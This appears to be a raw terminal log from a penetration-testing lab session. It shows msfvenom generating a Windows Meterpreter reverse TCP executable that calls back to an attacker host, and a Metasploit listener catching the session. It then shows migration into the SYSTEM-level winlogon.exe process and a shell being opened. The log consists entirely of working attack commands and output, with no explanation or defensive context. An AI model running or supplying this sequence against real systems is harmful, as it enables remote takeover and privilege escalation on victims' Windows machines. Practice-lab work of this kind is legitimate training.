msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f exe -o shell.exe msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST tun0 msf6 exploit(multi/handler) > set LPORT 9001 msf6 exploit(multi/handler) > run

meterpreter > ps winlogon PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 548 468 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe meterpreter > migrate 548 meterpreter > gituid Server username: NT AUTHORITY\SYSTEM meterpreter > shell